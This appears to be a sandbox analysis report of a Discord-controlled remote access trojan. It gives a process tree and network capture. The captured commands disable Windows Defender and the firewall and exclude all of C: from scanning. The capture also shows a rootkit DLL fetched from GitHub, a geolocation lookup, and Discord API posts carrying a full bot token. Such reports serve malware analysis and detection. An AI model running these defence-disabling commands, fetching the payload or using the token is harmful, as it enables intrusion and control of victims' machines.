- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4708
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4692
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3532

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4892

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1796

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2212

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2628

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3936

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1108

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4268

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 261ec0526bfcb61325556476ed91ab50 sxjgawHGc0qPumap7YkhNg.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:5400
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5988

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Writes to the Master Boot Record (MBR)
PID:1644

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Drops file in Windows directory
PID:4532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:5200

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:5612

Network

DNS

gateway.discord.gg

Discord rat.exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.134.234

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.130.234

gateway.discord.gg

IN A

162.159.136.234
GET

https://gateway.discord.gg/?v=9&encording=json

Discord rat.exe

Remote address:

162.159.134.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: BIRLWE37OgZUC9UIq6248Q==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Sun, 30 Jun 2024 18:14:39 GMT
Connection: upgrade
sec-websocket-accept: 3XknPQA7tPYY8QYG7+y+cCkrRUY=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LpEyCzeTX20B3qB8kBLS1nQyfxBDQOVMhcD8QRigMrqaVuDiusth%2BqP4M6JmhOMIyiVutUpLsiHQLN84s31n4D%2BRIXD0gfdZFUEGAZoqVknq19x4qURWE8O7yo6tdyVzPoZAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 89c023207aef7701-LHR
DNS

8.8.8.8.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

149.220.183.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

Discord rat.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll

Discord rat.exe

Remote address:

185.199.109.133:443

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 228352
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "203145ec2994d7643896aaf6abba8dfbc568c9200abb439ca133157a79a6c0be"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 5229:3B0DC8:8A70F:AF761:66819F93
Accept-Ranges: bytes
Date: Sun, 30 Jun 2024 18:14:40 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600055-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1719771280.003072,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 81969a2455daa7ec68ce2458044de38aaa944748
Expires: Sun, 30 Jun 2024 18:19:40 GMT
Source-Age: 253
DNS

g.bing.com

Dnscache

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

backgroundTaskHost.exe

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3D5B92D2E06E6F8012C6867CE1496E70; domain=.bing.com; expires=Fri, 25-Jul-2025 18:14:44 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D4B534A60556444B9E3E478413BF555B Ref B: LON04EDGE0711 Ref C: 2024-06-30T18:14:44Z
date: Sun, 30 Jun 2024 18:14:43 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

backgroundTaskHost.exe

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3D5B92D2E06E6F8012C6867CE1496E70; _EDGE_S=SID=089EABFF90F165011C69BF51915264A8

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=9OGNmxCQYr8JbkhsSnXXFdeGaAdCRi4oQ3ouF4NDBtI; domain=.bing.com; expires=Fri, 25-Jul-2025 18:14:45 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FB65BDB6AA6A4945B5D824F7BC4D4826 Ref B: LON04EDGE0711 Ref C: 2024-06-30T18:14:45Z
date: Sun, 30 Jun 2024 18:14:44 GMT
DNS

234.134.159.162.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.134.159.162.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

133.109.199.185.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

237.197.79.204.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

discord.com

Discord rat.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232
POST

https://discord.com/api/v9/guilds/1256666099580403734/channels

Discord rat.exe

Remote address:

162.159.135.232:443

Request

POST /api/v9/guilds/1256666099580403734/channels HTTP/1.1
authorization: Bot MTI1Njk1OTk3MzkyMjA1MDA0OA.GGLfYW.bDrMZAIyeTVgyJMSqQFO2gDeB0CtQKGKri6ACU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 201 Created

Date: Sun, 30 Jun 2024 18:14:41 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=9ea33608370c11efbc10ba42eb0edab5; Expires=Fri, 29-Jun-2029 18:14:41 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1986
x-ratelimit-reset: 1719839796.478
x-ratelimit-reset-after: 68515.316
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rnaytrETcLdA8T6PtEnsMdX4fc0If0LCIEJHo6%2BjpScATtJXNLDedjykxtxmwya2SzFd8aOr0ifDIQVgcGbLmjm0ve2e3q%2BQw%2BqHwWU9CuZ5klaDlEHlM8Rkklu7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=9ea33608370c11efbc10ba42eb0edab51a44e5ed373dda4e0ea92931b43ab00361daa070a49aef6d14d0fd5219f5ecd8; Expires=Fri, 29-Jun-2029 18:14:41 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=ed8ea3a21e785302c2c0c1f2d0965bf29e5ef49e-1719771281; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=Dd8UGnLusI5C71.CV6.lcNDRWyzW_iiwvmBHHU0X_fo-1719771281292-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89c0232a6ce494f6-LHR
DNS

geolocation-db.com

Discord rat.exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A

Response

geolocation-db.com

IN A

159.89.102.253
DNS

geolocation-db.com

Discord rat.exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A
DNS

20.160.190.20.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

232.135.159.162.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

232.135.159.162.in-addr.arpa

IN PTR

Response
GET

https://geolocation-db.com/json

Discord rat.exe

Remote address:

159.89.102.253:443

Request

GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 30 Jun 2024 18:14:42 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
GET

https://geolocation-db.com/json/

Discord rat.exe

Remote address:

159.89.102.253:443

Request

GET /json/ HTTP/1.1
Host: geolocation-db.com

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 30 Jun 2024 18:14:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
POST

https://discord.com/api/v9/channels/1257036604460109975/messages

Discord rat.exe

Remote address:

162.159.135.232:443

Request

POST /api/v9/channels/1257036604460109975/messages HTTP/1.1
authorization: Bot MTI1Njk1OTk3MzkyMjA1MDA0OA.GGLfYW.bDrMZAIyeTVgyJMSqQFO2gDeB0CtQKGKri6ACU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 30 Jun 2024 18:14:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=9fd18250370c11efa117421a155b6898; Expires=Fri, 29-Jun-2029 18:14:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1719771284.171
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdMur6b9Vt95zV36euqk2BD4SZT1QsOhwWoiqKYRAQW4mm7tFRylsyf1U%2BM8z%2BrgbbJO3%2F%2FxCGDDdaDEkgOsqzXu2%2F6OYcB3QJn5TBF%2B%2FJjUR3hQ3vGvAgvtMHqC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=9fd18250370c11efa117421a155b68986e6b4eaec414b5b0f2ebc79ed22fe1da00886eb199bd14810bc4936c72c3e8ee; Expires=Fri, 29-Jun-2029 18:14:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=013678b4607fbf6728ee4d754874ad20f83246dd-1719771283; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=4O0r8II7Mm55EQoS_4y2jTNSXGCbn.ZNKcUhHpXucrc-1719771283267-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89c023370c5b3854-LHR
DNS

253.102.89.159.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

253.102.89.159.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/aes/c.gif?RG=196c9d63a3b54bd7a3c9e9000bcc924d&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T190833Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

backgroundTaskHost.exe

Remote address:

23.62.61.194:443

Request

GET /aes/c.gif?RG=196c9d63a3b54bd7a3c9e9000bcc924d&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T190833Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3D5B92D2E06E6F8012C6867CE1496E70

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ACCAA6F2D550409A97217C24BBDD0317 Ref B: AMS04EDGE1619 Ref C: 2024-06-30T18:14:45Z
content-length: 0
date: Sun, 30 Jun 2024 18:14:45 GMT
set-cookie: _EDGE_S=SID=089EABFF90F165011C69BF51915264A8; path=/; httponly; domain=bing.com
set-cookie: MUIDB=3D5B92D2E06E6F8012C6867CE1496E70; path=/; httponly; expires=Fri, 25-Jul-2025 18:14:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1719771285.a747a27
DNS

194.61.62.23.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

194.61.62.23.in-addr.arpa

IN PTR

Response

194.61.62.23.in-addr.arpa

IN PTR

a23-62-61-194deploystaticakamaitechnologiescom
POST

https://discord.com/api/v9/channels/1257036604460109975/messages

Discord rat.exe

Remote address:

162.159.135.232:443

Request

POST /api/v9/channels/1257036604460109975/messages HTTP/1.1
authorization: Bot MTI1Njk1OTk3MzkyMjA1MDA0OA.GGLfYW.bDrMZAIyeTVgyJMSqQFO2gDeB0CtQKGKri6ACU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 30 Jun 2024 18:14:48 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a3053bba370c11efa8fa6a9cffd203e3; Expires=Fri, 29-Jun-2029 18:14:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1719771289.524
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NEmiS31GHxThQGBd%2BjBprEx%2Fg%2FyJAUbjMiO36YieH%2FvWzsg3eIWWl6%2FjQ2aKGJEAlUEWi75nmx6NwanJsVSXScfjo%2FdnlA9UdWzA1Z6DOVbaRUKBPw0XxKi79cgv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a3053bba370c11efa8fa6a9cffd203e319ddc95ba58249d7907fd974bec7d9d04629ea460622fef7343bd367c8773e61; Expires=Fri, 29-Jun-2029 18:14:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=00d1d9603a6d26103d9d24f14a979835b5f35602-1719771288; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=z1b3NjgnkgUokNU89WOtmEqdgsuiZNlHyK8qzz.Kk0U-1719771288641-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89c023583bbf93d7-LHR
DNS

97.17.167.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

107.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.12.20.2.in-addr.arpa

IN PTR

Response

107.12.20.2.in-addr.arpa

IN PTR

a2-20-12-107deploystaticakamaitechnologiescom
DNS

80.90.14.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.90.14.23.in-addr.arpa

IN PTR

Response

80.90.14.23.in-addr.arpa

IN PTR

a23-14-90-80deploystaticakamaitechnologiescom
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
DNS

10.27.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.27.171.150.in-addr.arpa

IN PTR

Response
DNS

24.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.73.42.20.in-addr.arpa

IN PTR

Response
DNS

discord.com

Discord rat.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
DNS

232.138.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.138.159.162.in-addr.arpa

IN PTR

Response

162.159.134.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

Discord rat.exe

8.4kB
142.8kB
160
192

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
185.199.109.133:443

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll

tls, http

Discord rat.exe

4.9kB
241.7kB
96
182

HTTP Request

GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll

HTTP Response

200
204.79.197.237:443

